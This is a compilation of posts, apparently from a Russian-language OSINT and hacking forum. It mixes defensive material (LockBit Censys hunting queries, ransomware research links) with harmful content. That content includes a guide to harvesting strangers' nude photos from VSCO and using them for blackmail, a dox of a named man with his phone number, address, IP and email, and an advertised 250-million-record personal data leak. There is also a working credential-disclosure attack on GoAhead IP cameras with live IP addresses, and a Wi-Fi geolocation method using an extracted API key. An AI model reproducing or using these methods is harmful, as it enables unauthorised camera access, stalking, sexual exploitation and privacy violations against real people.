У тебя есть сайт. Wayback Machine посылает своих роботов аналогично поисковым системам, которые индексируют данные. Роботы создают снимки страниц твоего сайта и сохраняют всё найденное в базу в хронологическом порядке. Все снимки твоего сайта доступны любому пользователю. Грубо говоря Wayback Machine клонирует твой сайт и сохраняет в свою базу. И что важно, снимки делаются регулярно.
Допустим вы указали на странице «Контакты», номера сотовых телефонов своих сотрудников. Затем через неделю передумали и удалили персональные данные, почистили кеши google и yandex. Проверили что номера не ищутся в поисковых системах. И вроде все хорошо, но до того как вы произвели зачистку, на ваш сайт зашел робот Wayback Machine и сделал снимок всех страниц, в том числе страницы «Контакты».
Имея в распоряжении URL вашего сайта, оперативный сотрудник согласно директиве Check WebArchive заходит на сайт Wayback Machine и смотрит хронологию изменений. Естественно с легкостью находит номера сотовых телефонов вашего персонала, которые вы давным-давно удалили.
Wayback Machine выступает неким инструментом для бекапа (резервная копия).
Это касается любой информации, которую вы удаляете и изменяете у себя на сайте. Все что публикуется в сеть интернет, остается там навсегда.
Во времена динозавров, отлично работал метод остановки через файл robots.txt. Где прописывался запрет на индексацию, конкретно под User-agent.
User-agent: ia_archiver
Disallow: /
User-agent: archive.org_bot
Disallow: /
В наше время данный способ устарел и работает примерно на 30% (судя по статистике), что естественно меня не устраивает. Теперь для остановки роботов, необходимо подготовить и написать специальное письмо на адрес электронной почты info@archive.org
Полезные наблюдения при подаче заявки
Письмо лучше писать с почты, которая привязана к домену.
Шаблон необходимо заполнять на английском языке и указывать достоверные данные.
Нельзя менять структуру шаблона и тему письма. Так как письмо будет обрабатываться в автоматическом режиме. Первый этап обрабатывает робот, второй этап живой менеджер, который может задать дополнительные вопросы. Менеджер так-же постарается вас отговорить от исключения вашего сайта из их системы, не поддавайтесь, стойте на своем и грозите карами и судами.
Собственно рабочий шаблон письма:
тема письма: DMCA Take Down Notice
Sir,
I am owner of domain name and website "blablabla"
I request you to remove the following link from your website
web.archive.org
My Address - "Banana street 15, office 24"
Phone No. - "+12345678901"
Email Address — "info@blabla.bla"
I have a good-faith belief that the disputed use is not authorized by the copyright owner, its agent, or the law.
The above information in this notice is accurate, and under penalty of perjury, I am the owner of the copyright interest involved.
Signature — "Vasiliy Pupkin"
Через некоторое время заходим на wayback machine и должно получиться!
To hunt for infrastructure related to LockBit ransomware using Censys, we need to craft specific queries that focus on identifying the distinct characteristics of the LockBit ransomware group. LockBit uses a variety of infrastructure, including C2 servers, data leak sites, TOR hidden services, and services for victim communications, among other things.
1. Hunting for Known LockBit IP Addresses
LockBit’s infrastructure may persist over time, and known IP addresses can
help track them.
Query:
Code:Copy to clipboard
ip:"198.51.100.123" OR ip:"203.0.113.45"
Explanation: Replace the IPs with those identified from threat intelligence
feeds or past LockBit incidents.
2. Search for Tor Exit Nodes
LockBit may use Tor services to anonymize its C2 infrastructure and victim
communication portals.
Query:
Code:Copy to clipboard
services.tls.certificates.leaf_data.subject.common_name: "*.onion"
Explanation: This query identifies SSL certificates associated with .onion
domains, which may indicate services running over the Tor network.
3. SSL Certificates for Self-Signed or Generic Certificates
LockBit actors frequently use Let’s Encrypt or self-signed certificates to
secure their infrastructure.
Query:
Code:Copy to clipboard
services.tls.certificates.leaf_data.issuer.common_name: "Let's Encrypt" OR services.tls.certificates.leaf_data.issuer.organization: "LockBit"
Explanation: This query identifies SSL certificates issued by Let’s Encrypt or
certificates with "LockBit" in the issuer fields.
4. Search for Exposed RDP Ports
LockBit may exploit exposed RDP ports for initial access.
Query:
Code:Copy to clipboard
services.port:3389 AND services.http.response.status_code:200
Explanation: This query looks for exposed RDP services (port 3389) with an
HTTP service also running, potentially showing LockBit activity.
5. Identifying Potential LockBit C2 Servers
LockBit C2 servers can be identified by their use of certain HTTP headers or
running on specific ports.
Query:
Code:Copy to clipboard
services.http.response.headers.server: "Apache" AND services.http.response.body: "LockBit"
Explanation: This query searches for servers running Apache with a response
body related to LockBit operations.
6. Searching for Known Data Leak Sites
LockBit maintains data leak sites where they publish stolen data. These sites
may be hosted on publicly accessible servers.
Query:
Code:Copy to clipboard
services.http.response.body: "LockBit Data Leak"
Explanation: This query hunts for web servers containing the phrase "LockBit
Data Leak" in the HTTP body.
7. Finding Custom HTTP Headers Used by LockBit
LockBit servers may use unique HTTP headers or configurations.
Query:
Code:Copy to clipboard
services.http.response.headers.server: "nginx" AND services.http.response.headers.x-powered-by: "LockBit"
Explanation: This query looks for nginx servers using a custom X-Powered-By
header indicating potential LockBit-related infrastructure.
8. Hunting for Publicly Exposed Vulnerable Web Applications
LockBit may target outdated web applications with known vulnerabilities.
Query:
Code:Copy to clipboard
services.http.response.headers.server: "Apache/2.2.15"
Explanation: This query identifies outdated versions of Apache web servers,
which are frequently targeted by attackers for exploitation.
9. Searching for Services Running on Common LockBit Ports
Certain ports are commonly used by LockBit for C2 communications.
Query:
Code:Copy to clipboard
services.port:50050 OR services.port:8080
Explanation: This query looks for services running on port 50050 (commonly
used for C2 communication) and port 8080.
10. Identifying Self-Signed Certificates
LockBit infrastructure may use self-signed certificates.
Query:
Code:Copy to clipboard
services.tls.certificates.leaf_data.issuer.common_name: "example.com" AND services.tls.certificates.leaf_data.self_signed: true
Explanation: This query searches for self-signed certificates with common
names like "example.com" that might be used in LockBit C2 infrastructure.
11. Combining Queries for Comprehensive Hunting
To refine the search for LockBit infrastructure, combine multiple filters.
Advanced Query Example:
Code:Copy to clipboard
services.http.response.headers.server: "nginx" AND services.http.response.body: "LockBit" AND services.port:8080 AND location.country_code: "RU"
Explanation: This combined query searches for nginx servers potentially related to LockBit, filtering by port 8080 and limiting results to servers hosted in Russia (RU).
Собственно в название темы вопрос. **Глаз. бога и т.п. боты - у меня есть базы
Подскажите пожалуйста все лучшие боты и сервисы решения (на Ваш взгляд) на текущий момент, заранее спасибо!
Существует приложение для редактирования фоток VSCO - https://vsco.co/
При монтаже VSCO предлагает опубликовать это фото в профиль, доступный всем желающим. Многие хотят просто отредактировать/обработать фото быстро, из-за этого просто соглашаются со всем, нажимая на кнопку опубликовать - соответственно любая х#йня попадает в открытый доступ, в том числе и НЮДСЫ.
Как искать годноту:
Мы заходим на https://vsco.co/search/people , пишем в поиск НА АНГЛИЙСКОМ
рандомную фамилию, имя или его производную (Настюшка, Светулька, Анюта),
прозвище: кискарыбкашкурка,
номер телефона небольшим диапозоном 790 - поиск дальше найдет по совпадениям,
Эмодзи - всякие сердечки, значок 18+, орехи/персики/арбузы
Куски женских фамилий "ова", "аева", "ская", "цкая", "ина", "ына" на транслите
Порой любое рандомное слово сможет вывести на годноту, импровизируйте!
Пишем имя фамилию прочую х#йню, нам выбивает аккаунты с похожими названиями и
мы листаем, на колесико мыши открываем акки в новой вкладке.
Потом когда надоест начинаем их смотреть, рано или поздно попадется дурочка с
интересными фото.
Как найти своих подружек в VSCO через мобильное приложение?
Инструкция ниже:
Куда залить находки?
Желательно на Mega.NZ - создаём аккаунт на любую временную почту на temp-mail
и 20-гиговое облако доступно для залива.
Если создаешь слив там, позаботься сделать бэкап на доп. аккаунт или/и
gofile.io. Не забывайте ставить на все архивы пароль.
Если есть только одна находка, а не хуева тьма - cyberdrop.me в помощь.
Создаешь альбом и заливаешь фотки туда.
Нашли царицу с нюдсами?
Надо сохранить, ибо крысы осинтят, находят и сливают дефкам их факап со
сливом.
Также стоит заметить, что НЕЛЬЗЯ подписываться на девушку. Иначе ей придёт
уведомление, что какой-то Антоша из интернетов любуется её прелестями, и она
удалит весь контент быстрее, чем вы успеете достать дрочило.
Какой профит можно поиметь? Как минимум - самоудовлетворение, для более продвинутых - шантаж (не составит труда в наше время найти даму в тг/вк/etc с помощью различных ботов)
Примеры недавних находок:
https://vsco.co/yakovenko-12/gallery
https://vsco.co/malena9878/gallery
https://vsco.co/plotnikova-valeria/gallery
Всем удачных находок, и не забывайте ими делиться)
It was have daily limit for background report ( 5x )
reason why i want that it was really background report and free so i was not
need use some card and etc
anyways I tried to find it before I write this post but not successful
Good Evening Sirs
I'm going to start by saying I am reasonably new to this game so certainly
will have some gaps in knowledge.
I've recently found great interest in the art OSINT and have given it a go
myself with some success - managed to find email, all social media accounts,
multiple IP's, and potential addresses (although think this is incorrect), and
passwords (which are certainly outdated) for my first mark.
I've used some basic tools like sherlock to gather information, general social engineering to get access to social accounts and from username searches against twitter data breach was able to match an email (along with a cross exam of a selection of other leaks including the email address). My issue is that I know for sure that the mark operates with several email addresses and I cannot for the life of me attribute a phone number to any account, i've tried ebay and paypal for partial numbers to brute force but there are no accounts for the email with either.
Also worth noting that the mark is UK based and so readily online information is limited in terms of personal data (ie phones and email). The mark is aware of the investigation (task for uni to try and gather as much info about a fellow classmate) and we are allowed to use morally and legally questionable means (obviously phishing etc is limited as mark will be on the look out for shady links). I also am not able to access any of the hardware marks: phones, laptops/PCs, routers etc.
Literally any help would be great, i've been doing my own digging for about a day but feel like im reaching a brick wall of my limited knowledge!
Как пробить человека по телефону? есть тот же pipl, но они работают только с компаниями.
Слышал байку, что в сети магазинов "Магнит" стоит СУПЕР-ПУПЕР система(они ее
выкупили у производителя) для проверки физиков. "Глаз бога" и т.п. ей в
подметки не годятся.
Вопрос: кто-нибудь знает что за "Неуловимый Джо" там используется?
250 MILLION USA HUGE LEAK [250,000,000 LINES+]
Contents : Full names, phone numbers, and email addresses Date of birth,
marital status, and gender
House cost, home rent, home built year
ZIP codes, home addresses, and Geolocation
Credit capacity and political affiliation
Salary, income details, and number of owned vehicles
Number of children in the household
Number of owned pets
pshe data may be a little old, but enjoy
отличная вещь
Это GitBook, цель которого - хранить под рукой заметки о пентестах. Он далек от совершенства в плане организации (поэтому его и называют «беспорядочным»). Так что, если вы тоже найдете его полезным, не стесняйтесь использовать его..... Разумеется, с полной ответственностью!
![ppn.snovvcrash.rocks](/proxy.php?image=https%3A%2F%2F1743652255-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook- x- prod.appspot.com%2Fo%2Fspaces%252F-MZ5E8Fq0UBQAc7rbfId%252Fsocialpreview%252FO9NV913SeHszQuNmUZEV%252Flogo.png%3Falt%3Dmedia%26token%3D017365ae-f1c5-4447-8b8a-16a5c2d8494d&hash=88475121386918ede74381e5cd8495b2&return_error=1)
![ppn.snovvcrash.rocks](/proxy.php?image=https%3A%2F%2F1743652255-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook- legacy- files%2Fo%2Fspaces%252F-MZ5E8Fq0UBQAc7rbfId%252Favatar-1620169112076.png%3Fgeneration%3D1620169112516838%26alt%3Dmedia&hash=d25e29e7c7badc1ce156a76bc532f503&return_error=1) ppn.snovvcrash.rocks
High-Speed Pizza Delivery
snovvcrash.rocks
Как могу узнать информацию о Email адресе? Или кто поможет найти владельца одного Email
нужно региться,
никаких карт вбивать не нужно
вместо покупки выбрать "записаться по коду"
Hidden content for authorized users.
Промокоды:
SOCMINT Beta Test Code: SOCMINT04553
OSINT Beta Test Code: OSINT7283
DarkWeb Beta Test Code: DarkWeb89022
в целом выглядит как поделка на вордпрессе, но информация систематизирована
Здравствуйте!
Моя первая тема тут и попытаюсь максимально подробно все описать.
Сейчас в TON сообществе пошла волна крипто токенов как и на Solana.
Некие умельцы (по акценту из Украины) объявили сбор ТОН для запуска своего
токена. Всем тем кто участвовал в сборе ТОН должны были в конце отправить
крипто-токены BURJ.
Начал рекламировать данный проект блогер Руслан Соколовский (блогер которого судили за ловлю покемонов в храме).
26 Мая
Это дата когда был завершен сбор денег. Всего было собрано 96K TON = **710K $
29 Мая**
Крипто токен был запущен на обменике DeDust.io и начались торги. Торги пошли не очень успешно из за чего возникли разногласия между командой BURJ и командой Руслана Соколовского (точнее Аногем - команда которая выполняла манипуляции на рынке чтобы удержать курс).
График : https://dexscreener.com/ton/EQC5iwcViDwLUeuFFtuI6KEArTaz_eBhn92Tfgtp1oGfbbLw
29-30 Мая
Команда $BURJ собщила, что проект будет перезапущен из за несправедливого обвинения в мошенничестве, что привело к панической продажи. Они самостоятельно, без согласия с командой Соколовского продали все токены (ударили по стакану) и оставили у себя **96K TON
Финал Скама**
Команда БУРЖ долго потом вела разговоры со всеми участниками, мол, готовим возврат ТОН всем кто скинул. Но! В итоге перечислили все на биржу OKX.
Их кошелек : UQAJ_ZpQxBnkVQQR-vtk2Sb6ATrtkR8jjnuyKDdUfvqbcA3D
Кошелек OKX : UQBfAN7LfaUYgXZNw5Wc7GBgkEX2yhuJ5ka95J1JJwXXf9t5
Комментарий вывода : 6228505
Главный Участник: Mihail Nemarov
У него на аватарке была фото слева в красном. Но по видимому он просто украл
фото реального человека: Комашко
Олександр
Был найден Instagram реального человека и он мягко говоря был шоке и создал
несколько сторис где он был в непонятке и объяснил, что ничем таким он не
промышляет.
Пробив: Глаз Бога
Узнали номер телефона +380938685440 и новое имя: Рыбинцев Владислав Олегович из Днепра
Старые ВК страницы:
Telegram ID : 5925080422
Телефон(ы): 380938685440
🗃 Изменения профиля:
├ 27.05.2024 - @MihaNem | Mihail | Nemarov
├ 30.12.2023 - @MihaNem | РЫБА |
├ 04.03.2024 - @MihaNem | T coach Рыбинцев | Влад
├ 11.04.2024 - @MihaNem | Влад | Офис
└ 30.05.2024 - | Mihail | Nemarov
🗝 Регистрация: ≈фев,2023 (1 год)
🖥 Возможные сервера: Киев(UA)
Группы: 1
Интересовались: 14 человек
Репутация:
(1)
(0)
Социальная метка:
️
Мошенник (1)
├ Номер: 380938685440
├ Страна: Украина
└ Оператор: неопределен
Возможные имена:
└ Рыба, Влад, T Coach Рыбинцев Влад, Vlad Riba, Влад Оф, Влад Офис, Влад Рыба,
Владик Рыбинцев, Рыба
ФИО: Рыбинцев Владислав Олегович
Возможные адреса:
Днепр Миронова - Европейская Д. 10
Возможный IP: 46.96.12.99
Email: vlad.ribincev@gmail.com
Facebook:
100021357771060
Telegram: 5925080422
Группы Telegram: 1
👁 Интересовались: 11 человек
Второй участник: DTC Labs
По нему данных меньше. Вот что выдает бот:
ID: 6098131936
🗃 Изменения профиля:
├ 25.03.2023 - @Arturio_p2p | Artur |
├ 15.05.2023 - @Anastasia_luxeshop | Anastasia |
├ 19.12.2023 - @Anastasia_official_01 | Anastasia |
└ 20.05.2024 - @dtclab | DTC Labs |
🗝 Регистрация: ≈мар,2023 (1 год)
Группы: 1
Интересовались: 17 человек
Репутация:
(1)
(1)
Видео с их Голосами
Итоги + Вопросы
1. Может ли кто-то помочь расширить поиски по ним?
2. Есть ли возможность узнать данные пользователя OKX если мы знаем
транзакцию
с его комментарием для его кошелька?
Доброго времени суток, какие полезные модули малтего есть на гит хабе для поиска по никнейму почте номеру и так далее
I have met many people who are starting to use FOFA as their main search
engine for recon.
Is it really a good search engine?
Are his results more accurate than in other search engines?
Этот архив ресурсов был организован таким образом, чтобы распределить темы
по различным областям, что позволяет использовать их для различных видов
разведывательной работы и задач, связанных с киберугрозами. Хотя все три вида
разведданных необходимы для принятия эффективных решений, они различаются по
направленности, масштабу, срокам и целевым пользователям, что отражает
иерархические уровни и оперативные требования организации или военного
командования.
**
Вы должны это
проверить!**
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F85c55a482b2259242c856c0c746899c2be6d9d38a642c15b524a9014a4e0006e%2FBushidoUK%2FOpen- source-tools-for-CTI&hash=d461b3202054c8fcae376f82423cb168&return_error=1)
Source Tools for Cyber Threat Intelligence Analysts and Researchers ](https://github.com/BushidoUK/Open-source-tools-for-CTI)
Public Repository of Open Source Tools for Cyber Threat Intelligence Analysts and Researchers - BushidoUK/Open-source-tools-for-CTI
github.com
Допустим, мы не скрываем инфу о себе, а ищем ее на других.
И у нас есть страница недруга в ВК. Как нам быстро собрать с нее максимум
инфы?
Воспользуемся утилитой InfoApp (это встроенное приложение в ВК). Оно предлагает несколько функций:
-- Показывает комментарии искомого пользователя
Чем это может быть полезно? Человек может оставить в комментариях важную информацию о себе или спалить важный паблик (например, несколько раз я находил комменты людей в группах жилищных комплексов, т.е. по сути находил адрес).
**-- Показывает созданные искомым пользователям группы
**
Чем это может быть полезно? Ооо, это один из моих любимейших разделов.
Созданные человеком паблики часто являются какими-то проектами, мероприятиями,
где создатели (наши цели) указывают свои контактные данные, например, почты
или телефоны. А еще это может дать понять, кем работает человек, чем
увлекается и тд.
**
-- Показывает где упоминали искомого пользователя**
Эта функция находится в разделе "полезные ссылки" и похожа на функцию с показом комментов.
Показывает друзей друзей пользователя
В сером кружке слева от профиля обозначено количество общих знакомых с аккаунтом, который мы изучаем. Это полезно если человек решил скрыть знакомство с кем-либо, удалив его из друзей.
в приложухе есть еще куча полезных функций, я рассказал про самые на мой
взгляд полезные.
спасибо за внимание
Всем привет!
Как определить VPN (cisco,pulse,sonic etc) компаний точечно
Есть вариант сканить поддомены subfinder'ом , но как правило, они лежат на
обычных ипах и такие поддомены как "vpn.example.com" встречаются очень редко.
Возможно у кого есть решение и может помочь решить мой вопрос!
Отблагодарю!
![](/proxy.php?image=https%3A%2F%2Fblogger.googleusercontent.com%2Fimg%2Fa%2FAVvXsEi3ReTXSXrvjX4hEenOKMVYRdLPSMMV_- ECo62CGySqLUYIN-jUIuozqZBIsozV6Gzac-MbYZ1GfbnMvmRy-w_3cmJn- AOIgPQ4lIWOPf5hzxpRijggn2KImbTWh1kVjM1-bAURKv8w1A9NmsNho9ZaCML9uE6yEBXcaBRZu8LNU57YUGf2DK1aKDX1Mg%3Dw640-h360&hash=aced75082c8756e2d4d8d3a63bc34bad)
Installation:
Clone the github repo
**
Code:Copy to clipboard
$ git clone https://github.com/xadhrit/terra.git
Change Directory:
Code:Copy to clipboard
$ cd terra
Requirements:**
For requirements run following commands:
Code:Copy to clipboard
$ python3 -m pip install -r requirements.txt
Note
For Twitter Credentials :
You need credentials which are listed in twitter.yml
file in creds folder
for using terra.
You can find more about Twitter Api and Access Tokens on Twitter's Developer
Portal
For Instagram Credentails:
Put your Instagram's
username and password in creds/insta.yml
file. And
you are good to go.
Usage:
Basic Usage:
Code:Copy to clipboard
~/terra$ python3 terra.py <username of target>
help : -j for saving results in a JSON file
-f for text file
Twitter Recon Commands :
Code:Copy to clipboard
ls: Display all Terra Commands
help: For Help
quit: For quiting the program
clear: For cleaning your terminal screen
exit: For exiting from Terra
reset target : Reset new target in command line
tweets : Get latest tweets tweeted by Target
favtweets : Get latest tweets which favorited by Target
followers : Get target's followers list
following : Get target's following list
info: Get overview and infomation about target
profile pic: Download Target's Profile Picture
banner: Download Target's Profile banner
htags : Get hashtags used by Target
Instgram Recon Commands :
Code:Copy to clipboard
ls : Display Terra Commands,
help : for Help,
clear: for clearning your Screen,
quit: for quiting,
exit: For Exiting from Terra,
locations : For getting Pinned location of target,
captions : For gathering target's captions,
reset target: For resetting target in Terra,
comments : For all comments of target,
followers : For getting follower's list of target,
followings: For getting following list of target
followers emails : For target's followers emails,
following emails : For target's following emails,
followers phone : For target followers phone numbers,
followings phone : For target followings phone numbers,
tags : For getting hashtags used by target ,
timeline : For overview of target's account ,
likes: Get total_likes of target,
'
mediatype : For information of photos and video of target,
photodes : For gathering target photos description,
'
photos : For Downloading target's photos,
profile pic : For downloading target's profile picture,
stories : For downloading target's stories ,
tagged': For listing user who tagged by target,
commenter': For getting all user who commented on target's posts
ttag : For listing user tagged target in their posts
Every pull request with good and understandable code is welcomed.
Open an issue on Github.
Every time you relogin in instagram account you have to delete session ids
and cookies and fromcreds/settings.json
file and put an empty braces in file
like this
Python-twitter : https://github.com/bear/python-twitter
Instagram Private API : https://github.com/ping/instagram_private_api
Link - [Terra OSINT](https://www.kitploit.com/2021/10/terra-osint-tool-on-
twitter-
and.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+PentestTools+%28PenTest+Tools%29)
Terra is no longer an active project. I am looking for maintainers.
**Всем привет, выкладываю на github репозиторий с коллекцией списков вдохновения, руководств, чит-листов, блогов, хаков, однострочников, cli/web- инструментов и многого другого. В нем собрано много полезной информации в одном месте.
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F9434a09629f33cd87626bd21988a5dc3be636b1a8009f240be87bb10199b44ed%2Ftrimstray%2Fthe- book-of-secret-knowledge&hash=f1f49a3623a1b4be561ebd55c092af8d&return_error=1)
inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more. ](https://github.com/trimstray/the-book-of-secret-knowledge)
A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one- liners, cli/web tools and more. - GitHub - trimstray/the-book-of-secret- knowledge: A collection of inspiring lists, manuals,...
github.com
Оглавление:**
есть данные карты и имя и ip с чего начать пробив информации ?
дайте пару советов
Start investigation based on names: https://seintpl.github.io/NAMINT/
Доброго времени.
Изредка появляется необходимость анализировать юсдт кошельки. По старинке
пользуюсь tokenview и husdtscan.
Имеются ли какие-то более продвинутые системы аналитики ? Иногда рисовать все
эти связи с балансами - очень муторная задача.
Всем спасибо.
Требуются данные банка. Конфиденциально. Постоянно
OSINT ресурсы для исследования программ-вымогателей.
• Как известно, шифровальщики стали неизбежной, «фоновой» реальностью работы многих компаний по всему миру — а удачные атаки и многомиллионные суммы выкупа только подогревают этот сектор.
• Схемы распространения шифровальщиков бывают разными: одни выбирают весьма своеобразные (https://t.me/Social_engineering/2081) методы, а другие придерживаются стандартных вариантов. Однако и те, и другие получают успешный (для атакующих) результат и шифруют данные.
• В этой публикации представлен ряд полезных источников, которые помогут узнать много нового о шифровальщиках и научиться искать полезную информацию в ходе расследования инцидентов:
• Разведка:
➡Ransomlook (https://www.ransomlook.io/) - хранилище контента (форумы,
утечки, профили участников различных групп и многое другое).
➡DeepdarkCTI
(https://github.com/fastfire/deepdarkCTI/blob/main/ransomware_gang.md) -
информация об актуальных угрозах и хакерских группировках, позволяет нам
изучить цели, тактику, методы и различные инструменты, которые применяются на
этапе разведки и проникновения.
➡ID Ransomware (https://id-ransomware.blogspot.com/2024/09/) - блог
независимого эксперта. Можно найти информацию по менее известным группировкам
и атакам. Подача материала своеобразная, но найти что-то полезное можно.
➡Ransomware.Live (https://ransomware.live/) - новости о шифровальщиках, их
жертвах и переписках с ними, а также красивая статистика и инфографика.
➡Ransomwarehelp на Reddit (https://www.reddit.com/r/ransomwarehelp/) -
сообщество на Reddit, с полезным контентом и актуальной информацией.
➡No More Ransom (https://www.nomoreransom.org/ru/index.html) - ресурс от
Европола с полезными советами по предотвращению Ransomware. У них есть
бесплатные декрипторы (<https://www.nomoreransom.org/ru/decryption-
tools.html>) для многих штаммов программ-вымогателей, которые были
перепроектированы экспертами Европола.
➡Ransomware Map ([https://github.com/cert-
orangecyber...n/OCD_WorldWatch_Ransomware-ecosystem-
map.pdf](https://github.com/cert-
orangecyberdefense/ransomware_map/blob/main/OCD_WorldWatch_Ransomware-
ecosystem-map.pdf)) - визуализацию крупных атак программ-вымогателей на
протяжении всего времени.
• Крипта:
➡Ransomwhere (https://ransomwhe.re/) - сайт, позволяющий отследить все
выкупы жертв шифровальщиков.
➡opensanctions (https://www.opensanctions.org/datasets/ransomwhere/) - база
данных лиц и компаний, попавших под санкции или представляющих экономический и
политический интерес.
➡Chainabuse (https://www.chainabuse.com/category/ransomware) - платформа для
отчетов о злоупотреблениях в блокчейне.
➡BitcoinHeist Ransomware Dataset
(https://www.kaggle.com/datasets/sapere0/bitcoinheist-ransomware-dataset) -
коллекция BTC адресов, которые фигурировали в различных старых отчетах и
исследованиях. Довольно старый контент и не очень полезен для исследователей в
настоящее время, но может быть использован для исторического контекста.
• Новости и блоги:
➡CISA Alerts & Advisories (<https://www.cisa.gov/news-events/cybersecurity-
advisories>) - Агентство по кибербезопасности США. Тут очень много контента,
поэтому используйте фильтры при поиске новостей и другой информации.
➡Halcyon Power Rankings (https://www.halcyon.ai/top-ransomware-groups) - тут
публикуются ежеквартальные отчеты из мира Ransomware.
➡Ransom Groups DarkFeed (https://darkfeed.io/ransomgroups/) - ежеквартальная
статистика различных группировок и атак.
• Другие полезные ресурсы:
➡Ransomchats (https://ransomch.at/) - авторы собирают пруфы с помощью
парсеров и выкладывают их на сайте. Каждый контакт с группировкой оформлен в
JSON-файл. Обычно названия компаний-жертв не называются. Во всяком случае, они
остаются анонимными, пока об инциденте не расскажут СМИ или злоумышленники.
➡Tidalcyber
(https://app.tidalcyber.com/share/9a0fd4e6-1daf-4f98-a91d-b73003eb2d6a) -
техники, тактики и процедуры, которые относятся к определенным группам
шифровальщиков. Информация представлена в виде красивой матрицы в
структурированном виде, с пруфами и сигма-правилами.
➡Архитектура Шифровальщика (https://t.me/Social_engineering/1980) - как
хакеры шифруют огромный объем данных за считаные минуты...
S.E. (https://t.me/Social_engineering) infosec.work (https://t.me/+owNymgMzqsg4ZDEy) VT (https://t.me/SE_VirusTotal_bot)
Что мы об этом думаем?
Лично я получил 100 бесплатных кредитов и обожаю его. Лучший инструмент OSINT, который я когда-либо использовал.
Хотя и дороговато.
Мнения?
Больше всего задач есть на tryhackme.com. Данный сайт позволяет решать "комнаты", т.е. наборы заданий по одной или нескольким связанным темам.
Комната для тренировки навыков
Google Dorks (то есть правильного использования операторов расширенного поиска
Гугла). Один из основополагающих навыков в OSINT.
Searchlight. IMINT, или imagery
intelligence. Анализ изображений и фотографий.
Комната для тренировки навыков
GEOINT, или geospatial intelligence. Гугл.Карты, Wikimapia и все такое.
Сюда же можно добавить и geoguessr.com. Несмотря
на то, что многие пользователи тупо гадают, на сайте сервиса есть специальный
раздел для подготовки. В нем расписаны визуальные особенности местности разных
стран.
KaffeeSec - SomeSint. В этой комнате основной упор на SOCMINT (social media intelligence), поиск информации по социальным сетям.
Shodan.io — ну, тут и без комментариев все понятно. Комната для тренировки навыков поиска по интернету вещей с помощью поисковика Shodan.
Подписывайтесь на мой канал!
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FMgUBwcNrc5a7kqDCEHovJpnY4BZNeWuzctZmbTsLFgpYlmvxlL893VGEFf84NKLfBvgrGX6yaxINnKnhBDhDSIFjlhskTHWq5EY4nrszp7m2L7HVeR1crUAAlxQSqhpLI3H2-pYbHZTrxJy3s4sYnthkGfUz627V0-_siauwRKU_8Dbj0UcwlPstMdmNFf5ex4sx0du0ga29nsPl2VUG0tdKh8Lhpy1neiHw1seXD8463kcW0PK8NOjF7oOc9nHxvkn3pu1TtHTvrMFuCdottZNq- KYqsdjYbhiyrJ7kfT5OuncFO6sS4MbKvgS7LpE7Mk8rVtjOlgiwIb7dQnsNeg.jpg&hash=72f96ad7c9f688d5ca7f8372d59668f8&return_error=1)
Concordia et laetitia! Пишем и переводим материалы об OSINT и смежных дисциплинах. Наш бот, который покажет, в каких чатах состоит пользователь TG: @telesint_bot
t.me
Всем привет и сразу к делу:
Заходим в поисковик Shodan (или ищем другим методом)
Вписываем в поисковик Shodan:
realm="GoAhead", domain=":81"
по желанию можно еще добавить в конце country:RU (это если искать только по
Рашке, если хотите по другой стране то вписывайте другое сокращение)
Далее выбираем любой ip адрес и добавляем :81/system.ini?loginuse&loginpas ,
например:
62.43.120.101:81/system.ini?loginuse&loginpas
Документ system.ini будет скачан вам на комп'ютер.
Открываем его и ищем там что-то тип admin password (пароль может быть любым но
вот логин почти всегда admin)
если там пишет admin и пароля рядом нет то значит что пароля нет и ввести
нужно только логин.
Потом оставляете только ip и :81
Пример: 62.43.120.101:81
Нажимаете Enter и вводите логин и пароль который у вас уже есть.
Если что-то непонятно спрашивайте...
В некоторых камерах пароль не ставлят и просто вход по логину... Вот например
посмотри это
62.80.191.223:81 (просто введи логин: admin и нажми Enter)
До новых встреч.
Здравствуйте. Около месяца назад нашел в гугле некоторые нужные мне на сайте
страницы используя site и inurl. Они до сих пор существуют в неизменном виде.
Но сейчас гугл больше не находит эти страницы никак. Не только с помощью того
запоса, а даже используя поиск конкретной фразы со страницы, ее не найдет.
Хотя раньше нашло бы, так как страница не изменялась с того времени.
Собственно вопрос. Почему страницы могут переставать индексироваться, даже
если они все ещё существуют? И можно ли все таки их найти как нибудь?
нам понадобится: ключ доступа к api, любая актуальная wifi точка любой
локации.
Ключ доступа берем из исходников firefox - качаем себе с гитхаба репозиторий
mozilla/gecko-dev, распаковываем и поиском по всем файлам находим
MOZ_GOOGLE_LOCATION_SERVICE_API_KEY":"AIzaSyB2h2OuRcUgy5N-5hsZqiPW6sH3n_rptiQ".
для запроса создадим JSON файл test.json
Code:Copy to clipboard
{
"considerIp": false,
"wifiAccessPoints": [
{
"macAddress": "14:59:C0:2B:4B:C0",
"signalStrength": -90,
"signalToNoiseRatio": 0
},
{
"macAddress": "90:1A:CA:E2:1D:80",
"signalStrength": -40,
"signalToNoiseRatio": 0
}
]
}
где первая AccessPoint - произвольная актуальная wifi точка, а вторая - та
которую мы ищем, соответственно сила сигнала указана -90 для той точки которая
нам не интересна, -40 для той которую мы ищем.
"considerIp": false этот параметр нужен чтобы на результат не влиял внешний
айпи адрес с которого мы делаем запрос.
и выполним команду:
Code:Copy to clipboard
curl -d @test.json -H "Content-Type: application/json" -i "https://www.googleapis.com/geolocation/v1/geolocate?key=AIzaSyB2h2OuRcUgy5N-5hsZqiPW6sH3n_rptiQ"
получаем ответ:
Code:Copy to clipboard
HTTP/2 200
content-type: application/json; charset=UTF-8
vary: X-Origin
vary: Referer
vary: Origin,Accept-Encoding
date: Tue, 16 Jan 2024 16:45:42 GMT
server: scaffolding on HTTPServer2
cache-control: private
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
accept-ranges: none
{
"location": {
"lat": 35.3345486,
"lng": -81.8802134
},
"accuracy": 180
}
